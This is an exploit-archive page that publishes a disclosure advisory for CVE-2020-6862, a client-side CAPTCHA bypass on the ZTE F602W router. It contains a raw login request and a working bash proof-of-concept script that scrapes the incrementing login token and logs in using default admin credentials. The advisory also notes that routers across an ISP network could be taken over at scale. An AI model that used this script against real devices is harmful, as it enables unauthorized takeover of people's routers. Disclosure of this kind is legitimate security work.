exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ZTE F602W CAPTCHA Bypass

ZTE F602W CAPTCHA Bypass
Posted Sep 10, 2020
Authored by Hritik Vijay

The ZTE F602W router suffers from a CAPTCHA bypass vulnerability.

tags | exploit, bypass
advisories | CVE-2020-6862
SHA-256 | d415cdf47406b19582ff80faa7fa04887c852fb59dd457fd1341d4fd6f1226cb

ZTE F602W CAPTCHA Bypass

Change Mirror Download
# Exploit Title: ZTE Router F602W - Captcha Bypass 
# Exploit Author: Hritik Vijay (@MrHritik)
# Vendor Homepage: https://zte.com.cn
# Reported: 2019-06-14
# Version: F6x2W V6.0.10P2T2
# Version: F6x2W V6.0.10P2T5
# Tested on: F602W
# CVE: CVE-2020-6862

Background
-----------
Captcha is used to make sure the form is being filled by a real person
than an automated script. This is a very popular safety measure and
bypassing it could lead to potential compromise.

Introduction
------------
While logging in to the affected device you are presented with a
username, password and captcha field. Submitting the form results in an
HTTP request being sent out to /checkValidateCode.gch to validate the
captcha, if valid it goes on to really submit the login request. This
can be easily bypassed as this is a client side verification. One can
always ignore the response and proceed to forcefully submit the form via
Javascript (via calling the subpageSubmit() method).
A typical login request looks like this:

POST / HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Connection: close
Cookie: _TESTCOOKIESUPPORT=1
Upgrade-Insecure-Requests: 1

frashnum=&action=login&Frm_Logintoken=2&Username=admin&Password=admin&Validatecode=literally_anything

Though, firing the same request twice fails with a text on the top
saying "Error". This pretty much defeats our purpose. It turns out that
on every login attempt, the parameter Frm_Logintoken gets incremented by
one and is required to match the server side value. This can pretty
easily be achieved by some pattern matching. Thus allowing any script
to bypass the captcha and log in.

Threat
-------
A captcha bypass can really help in bruteforcing the credentials but
luckily the router limits the login trials to 3 attempts. In real
world though, things are a bit different.
The affected ZTE router comes with a default password. Given that the
devices on a same ISP network can access each other, it would be a
matter of time before someone writes a script to log in to every router
in the network and take control of it.

PoC
-------

#!/bin/bash

SERVER=192.168.1.1
USER="admin"
PASS="admin"

getToken(){
curl -s --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER | grep 'Frm_Logintoken")' | cut -d\" -f4
}

Frm_Logintoken=`getToken`

s=$(curl -sv --data "frashnum=&action=login&Frm_Logintoken=$Frm_Logintoken&Username=$USER&Password=$PASS" --cookie ' _TESTCOOKIESUPPORT=1; PATH=/;' $SERVER -w "%{http_code}" -o /dev/null 2> /tmp/zte_cookie)
if [[ $s -eq 302 ]]; then
echo "Logged in"
echo "Open http://$SERVER/start.ghtml"
echo `grep -o Set-Cookie.* /tmp/zte_cookie`
else
echo "Failed"
fi
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close